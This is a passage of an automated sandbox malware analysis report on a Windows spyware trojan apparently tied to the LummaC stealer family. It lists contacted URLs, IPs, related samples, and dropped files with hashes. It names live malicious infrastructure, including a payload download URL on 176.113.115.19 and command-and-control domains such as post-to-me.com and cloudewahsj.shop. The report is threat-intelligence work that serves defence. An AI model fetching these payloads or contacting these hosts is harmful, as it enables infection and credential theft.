https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exeiA#	J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEram	J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe	J18zxRjOes.exe, J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810771013.0000000000756000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000002.3948293292.0000000000756000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.1591238252.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DEi	J18zxRjOes.exe, 00000000.00000002.3948229777.0000000000723000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.0000000000723000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	J18zxRjOes.exe, 00000000.00000002.3947908120.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	J18zxRjOes.exe	false		high
http://x1.c.lencr.org/0	628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	628E.tmp.exe, 00000003.00000003.1659927938.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/	628E.tmp.exe, 00000003.00000003.1674075135.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1674094483.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1673634325.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1659801675.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1656763886.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1658044622.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1659115015.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1662055207.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000002.1737269659.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/	J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/A	628E.tmp.exe, 00000003.00000003.1674075135.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1674094483.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1673634325.0000000002EA5000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000002.1737269659.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DES	J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://post-to-me.com/u	J18zxRjOes.exe, 00000000.00000002.3948229777.000000000070D000.00000004.00000020.00020000.00000000.sdmp, J18zxRjOes.exe, 00000000.00000003.3810812443.000000000070C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	628E.tmp.exe, 00000003.00000003.1662159628.0000000002F52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	628E.tmp.exe, 00000003.00000003.1631558076.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631473888.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1631411771.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/apic	628E.tmp.exe, 00000003.00000003.1630460444.000000000050A000.00000004.00000020.00020000.00000000.sdmp, 628E.tmp.exe, 00000003.00000003.1629782890.0000000000500000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	cloudewahsj.shop	United States	13335	CLOUDFLARENETUS	false
104.21.56.70	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584186
Start date and time:	2025-01-04 15:32:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	J18zxRjOes.exe renamed because original name is a hash value
Original Sample Name:	75a2daff1ea8532d28cfba008de10a40.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/7@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 47 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 172.202.163.200, 20.190.159.0, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:33:19	API Interceptor	9043487x Sleep call for process: J18zxRjOes.exe modified
09:33:29	API Interceptor	5x Sleep call for process: 628E.tmp.exe modified
09:33:40	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
104.21.56.70	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse
	QQx0tdFC0b.exe	Get hash	malicious	LummaC	Browse
	LXS5itpTK7.exe	Get hash	malicious	Stealc	Browse
	ief722WreR.exe	Get hash	malicious	Stealc	Browse
	7gxaFDUSOD.exe	Get hash	malicious	Stealc	Browse
176.113.115.19	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudewahsj.shop	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
post-to-me.com	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse	172.67.166.199
	4.elf	Get hash	malicious	Unknown	Browse	1.13.111.69
CLOUDFLARENETUS	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse	172.67.166.199
	4.elf	Get hash	malicious	Unknown	Browse	1.13.111.69
SELECTELRU	176.113.115_1.170.ps1	Get hash	malicious	XWorm	Browse	176.113.115.170
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	178.132.202.249
	TUp6f2knn2.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	82.202.242.100
	2.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	1.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	GO.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	file.exe	Get hash	malicious	Unknown	Browse	176.113.115.178
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	ZxSWvC0Tz7.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	download.bin.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
37f463bf4616ecd445d4a1937da06e19	HGwpjJUqhW.exe	Get hash	malicious	GhostRat	Browse	104.21.56.70
	http://www.cipassoitalia.it/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.21.56.70
	nv8401986_110422.exe	Get hash	malicious	Qjwmonkey	Browse	104.21.56.70
	adguardInstaller.exe	Get hash	malicious	Unknown	Browse	104.21.56.70
	adguardInstaller.exe	Get hash	malicious	PureLog Stealer	Browse	104.21.56.70
	RisingStrip.exe	Get hash	malicious	Vidar	Browse	104.21.56.70
	adguardVPNInstaller.exe	Get hash	malicious	Unknown	Browse	104.21.56.70
	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.56.70
	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.56.70

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_628E.tmp.exe_1cf21654aa664fdb1444134b36dc15e4893d_4e22d986_e03f3903-18a6-4984-8246-cf4e6fb6e691\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0653935038774238
Encrypted:	false
SSDEEP:	192:QQXgXYOf0/I+mjvEmFXzuiFcrZ24IO8h:9gXYOM/I+mjbXzuiFcrY4IO8h
MD5:	9286648BDD716D0B402498F27F02A2EB
SHA1:	FE0D790413D31A298DD4ED43F6393355E3956B5B
SHA-256:	F03409304EDBD362DA3B984B1FB72C8E87E92C78F22F35C66A5F9028B8DDB61C
SHA-512:	0D8B92CC6BC40DCFF8770EE37977D7682EDAB0D3E02C0859584E3CACBAD719363D6B335F517DD462E974600B43294A9A9A831C5C9F291F37B9340951DF453461
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.7.4.8.1.5.2.5.9.8.0.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.7.4.8.1.5.7.1.2.9.2.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.3.f.3.9.0.3.-.1.8.a.6.-.4.9.8.4.-.8.2.4.6.-.c.f.4.e.6.f.b.6.e.6.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.2.c.0.7.e.a.-.e.b.8.2.-.4.2.a.5.-.8.5.8.0.-.e.6.1.9.5.3.9.e.e.3.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.6.2.8.E...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.0.c.-.0.0.0.1.-.0.0.1.4.-.6.f.4.5.-.c.8.9.d.b.5.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.4.c.d.b.d.6.b.2.0.e.7.2.f.b.b.a.6.2.e.5.d.4.d.d.a.2.b.1.6.b.7.0.0.0.0.f.f.f.f.!.0.0.0.0.7.c.e.b.2.9.1.d.c.9.5.2.1.d.4.9.d.1.e.2.1.5.a.f.7.b.6.0.b.4.d.e.1.8.7.d.0.8.d.2.!.6.2.8.E...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6ABC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 4 14:33:35 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	109786
Entropy (8bit):	2.1713330843240675
Encrypted:	false
SSDEEP:	384:tZ/jfXkNLWTB7Vnn/dzAJhTVQ2oVlcii/eU+9Yzs3vEld3t1zrHTfXz:tJLkpWTBZnn/dEbTDbQ3yd91rT
MD5:	140573DF6594E0E34CDBFF83031E0FCD
SHA1:	1F6283C7ECA4D9F1B94B704E9DE1763365994500
SHA-256:	E43D2EC885AB1EE34FB61610BAF77F1401224874BC9730A0707B7332E980BA73
SHA-512:	2739A14BF9F1066DE59CCA39DE4F6B25EDF8F24296408387F7F10E85A21F2EC4CDEF404053C83AB80E2D3F0C620373A7061A917C07FD79784C4B1C9E2212F44A
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........Fyg........................p...............h$......T....N..........`.......8...........T...........HE...g...........$...........&..............................................................................eJ......p'......GenuineIntel............T............Fyg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BB7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8394
Entropy (8bit):	3.697973273292073
Encrypted:	false
SSDEEP:	192:R6l7wVeJMK46Ol6YFW6xgmf7vpD989b5IsfkTm:R6lXJM16Ol6YE6xgmf7A57ft
MD5:	343BFAA1E33101717896AEBAA5531736
SHA1:	F0A7A00E7B97D2300805C2CBADE23FB8634BA63F
SHA-256:	CD7247E2D8E5A668887FA7BB10981539A0085D2704A18B4EAEB848826DDA4CC1
SHA-512:	4FC40A2252C4060669FC658A6E95A269A92BD6E3111D3F718FB4897A5110C428EA494F39D886AABB0D9C65FADF1DF7FE27C68B7853EB0A458B62E57A287120E9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BE7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4714
Entropy (8bit):	4.461352998104432
Encrypted:	false
SSDEEP:	48:cvIwWl8zsmJg77aI9mpWpW8VYPYm8M4JD2O3FE+q8vG2ORFSAMd:uIjf8I7QY7VTJqxKtmkAMd
MD5:	1CFF8DEA6175ACF56581FB7CAC279622
SHA1:	1FC0435E8BAE6DA664A6FCC6C482214078606B0F
SHA-256:	F4BE9F5A94042CAAD2E8905569F22B9F9AC6B61604451B11E36FCA8C125BA5E3
SHA-512:	514A90F4FA06AF8CD20B6BBD5DB2C6A127ABC42FBDAB218F37DC972DD1CE1A02611678CE953166074AFDE676B477670EE4315987F84645EA04D66FF4A2A70AE7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\J18zxRjOes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	324096
Entropy (8bit):	7.409084573923632
Encrypted:	false
SSDEEP:	6144:c80tLR1sx/zDkDzcFiyOARwCHCPCeWCzshOZcT:c/tF1sx/zDkDwE/GC6eBzshz
MD5:	7A3E26158D0BF299838749875FEB6232
SHA1:	7CEB291DC9521D49D1E215AF7B60B4DE187D08D2
SHA-256:	AD94F681001F2A56CA7BF4396B78E119BA71ACCA6F14EF6EED2EF54502246985
SHA-512:	54B6915CD85463DD5B9D208EA85490DF7B7695A7DA04325BC12E8454D9FFEA1854B7BE2868E84C62B0730CE3402AEC5654DDF585835D5A14FABBD74E622DCFEB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L.....'e.....................8......_D.......0....@.................................Y........................................#..P........o..........................................................x-..@............................................text...R........................... ..`.data........0...`..."..............@....rsrc............p..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Download File

Process:	C:\Users\user\Desktop\J18zxRjOes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	324096
Entropy (8bit):	7.409084573923632
Encrypted:	false
SSDEEP:	6144:c80tLR1sx/zDkDzcFiyOARwCHCPCeWCzshOZcT:c/tF1sx/zDkDwE/GC6eBzshz
MD5:	7A3E26158D0BF299838749875FEB6232
SHA1:	7CEB291DC9521D49D1E215AF7B60B4DE187D08D2
SHA-256:	AD94F681001F2A56CA7BF4396B78E119BA71ACCA6F14EF6EED2EF54502246985
SHA-512:	54B6915CD85463DD5B9D208EA85490DF7B7695A7DA04325BC12E8454D9FFEA1854B7BE2868E84C62B0730CE3402AEC5654DDF585835D5A14FABBD74E622DCFEB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L.....'e.....................8......_D.......0....@.................................Y........................................#..P........o..........................................................x-..@............................................text...R........................... ..`.data........0...`..."..............@....rsrc............p..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
